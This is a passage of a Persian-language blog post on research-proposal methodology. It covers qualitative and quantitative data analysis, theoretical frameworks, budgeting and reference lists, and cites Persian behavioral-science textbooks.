الف – تلخيص: يعني خلاصه كردن داده ها .
ب- عرضه : يعني ظاهر ساختن مجموعه اي سازمان يافته از داده ها، به طوري كه به كمك آنها بتوان نتيجه گيري نمود.
ج- نتيجه گيري و تاييد: يعني پژوهشگر از ابتدا به معناي هر رويداد ، به نظم رويدادها ، الگوي وقوع آنها و تبيين آنها و … پي ببرد و نتايج بدست آمده را با احتياط عرضه كند ، هرچند در وهله اول ممكن است مبهم به نظر آيد ولي به مرور زمان و با پژوهش هاي ديگر اثبات خواهد شد .
اما تجزيه و تحليل داده هاي كمي : تجزيه و تحليل اين داده ها را مي توان بصورت هاي مختلف تقسيم نمود مانند تجزيه و تحليل پارامتري و ناپارامتري و يا آزمايشي و غير آزمايشي.
در تجزيه و تحليل پارامتري مي توان پارامترهاي جامعه را برآورد نمود و از آمارهاي توصيفي و استنباطي مانند ميانگين ، واريانس ، انحراف معيار و… اما آزموني ناپارامتري است كه هيچگونه نتيجه گيري درباره پارامتري صورت نگيرد در تحليل ناپارامتري فقط آزمون فرض صورت مي گيرد.
تحليل داده هاي كمي در طرح هاي غيرآزمايشي به دو دسته عمده تقسيم مي شوند:
الف – تحليل داده هاي كمي در تحقيق پيمايشي: كه معمولاً مشخص كردن توزيع فراواني تك متغييري داده ها مورد نظر قرار مي گيرد و به اين جهت پارامترهاي جامعه از طريق برآورد نقطه اي يا فاصله اي محاسبه مي شود. ب- تحليل داده هاي كمي در تحقيق همبستگي : به سه دسته زيرتقسيم مي شوند:
1-ب- همبستگي هاي دو متغييري 2-ب- پيش بيني يا رگرسيون 3- ب- تحليل هايي كه روي ماتريس همبستگي يا كوواريانس صورت مي گيرد.
تحليل داده هاي كمي در طرح هاي آزمايشي نيز براي موارد تك نمونه اي و چند نمونه اي و تحليل واريانس بكار مي رود .

14- شرح چارچوبهاي نظري تحقيق :
«نظريه» واقعيتهاي موجود در قضايا را روشن مي كند؛ به اين معني كه قضايا به كمك داده هاي واقعي تجربي و در دنياي واقعي قابل آزمون است .
نظريه هميشه به صورت واقعي در فرايند «تحقيق» عرضه مي شود ، گاهي اوقات «تحقيق» به منظور آزمودن نظريه انجام مي شود . در برخي موارد « فرضيه تحقيق» از نظريه گرفته مي شود . در اغلب پژوهشها ، روشهاي تجزيه و تحليل ، وقتي قوي و مناسب است كه يافته ها را در جهت نظريه هاي تدوين شده هدايت كند.
ضروريست پژوهشگر نظريه دانشمندان و پژوهشگران را كه متناسب با موضوع تحقيق است در طرح تحقيق بيان نمايد و تا پايان تحقيق خود در چارچوب و قالب نظريه قدم بردارد .

15- بودجه بندي وخدمات :
در اين قسمت پژوهشگر با توجه به تعداد پرسنل ، نوع مسئوليت هريك ، كل ساعات كار و ميزان ساعات كار نيروي انساني براي اجراي طرح ، تداركات ، وسايل و تجهيزات مورد نياز را مشخص كرده و بر اين اساس هزينه طرح را برآورد مي كند سپس آن را به صورت طرح پيشنهادي براي درخواست اعتبار پژوهشي به سازمان تامين كننده اعتبار ارائه مي دهد.

16- فهرست منابع و ماخذ:

همچنين كليه منابعي كه در تهيه طرح پيشنهادي(Proposal) مورد استفاده قرار گرفته من جمله كتب ، طرح هاي پژوهشي ، پايان نامه هاي دانشجويي ، مقالات ، مجلات و گزارش هاي علمي و … در انتها فهرست گردد.


  • منابع :‌
    1- روشهاي پژوهش در علوم رفتاري از دكترزهره سرمد ، دكتر عباس بازرگان و دكترالهه حجازي .
    2- كندو كاوها و پنداشتها از دكترفرامرز رفيع پور .
    3- روشهاي پژوهش در علوم رفتاري(از نظريه تا عمل) از عباس خورشيدي ، فرشيد موفق و …
    4- فصل نامه هاي تعليم و تربيت

  • http://itmanager.blogfa.com/
  • برگرفته از ایران پژوهان

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

شما می‌توانید از این دستورات HTML استفاده کنید: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>